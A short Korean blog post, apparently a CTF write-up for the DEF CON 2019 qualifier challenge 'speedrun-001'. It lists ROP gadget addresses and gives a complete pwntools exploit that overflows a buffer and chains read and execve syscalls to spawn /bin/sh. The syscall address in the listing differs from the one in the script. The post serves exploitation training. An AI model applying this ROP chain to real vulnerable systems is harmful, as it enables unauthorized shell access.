Defcon Ctf 2019 Qualifier Speedrun001

LeeDoHyun · December 1, 2019

간단한 SROP 문제 입니다. ROPgadget 으로 pop(rax, rdi, rsi, rdx) 가젯을 구해주고, rp++로 syscall 을 찾아 익스하면됩니다.

syscall = 0x00474e65 #: syscall  ; ret  ;  (1 found)

pop_rdi = 0x0000000000400686 #: pop rdi ; ret
pop_rsi = 0x00000000004101f3 #: pop rsi ; ret
pop_rdx = 0x00000000004498b5 #: pop rdx ; ret
pop_rax = 0x0000000000415664 #: pop rax ; ret

exploit.py

from pwn import *

#context.log_level = "debug"
#r = remote("speedrun-001.quals2019.oooverflow.io", 31337)
r = process("./speedrun-001")
e = ELF("./speedrun-001")

syscall = 0x00000000004755f5
pop_rdi = 0x0000000000400686
pop_rsi = 0x00000000004101f3
pop_rdx = 0x00000000004498b5
pop_rax = 0x0000000000415664
binsh = "/bin/sh\00"

payload = "A"*0x400 + "B"*0x8
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi) + p64(e.bss())
payload += p64(pop_rdx) + p64(8)
payload += p64(pop_rax) + p64(0)
payload += p64(syscall)

payload += p64(pop_rdi) + p64(e.bss())
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(pop_rax) + p64(59)
payload += p64(syscall)

r.sendline(payload)
r.sendline(binsh)
r.interactive()

Twitter, Facebook